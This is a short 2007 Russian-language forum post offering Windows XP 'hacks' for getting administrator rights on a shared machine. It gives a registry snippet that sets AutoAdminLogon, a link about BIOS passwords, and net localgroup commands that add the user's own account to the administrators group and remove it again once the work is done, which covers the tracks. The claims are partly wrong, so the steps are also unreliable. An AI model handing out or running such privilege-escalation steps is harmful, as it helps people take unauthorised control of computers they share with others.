
03.09.2007, 11:58
|
|
Новичок
Регистрация: 22.05.2007
Сообщений: 3
Провел на форуме: 6702
Репутация:
2
|
|
Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
---------------------------------------------------------------------
http://www.elfqrin.com/docs/biospw.html
---------------------------------------------------------------------
Start> Run CMD
C:>net localgroup administrator YOURNAME /ADD
если администратора по другому называют выбери отсюда
C:>net localgroup
когда закончиш работать:
C:>net localgroup administrator YOURNAME /DELETE
|
|
|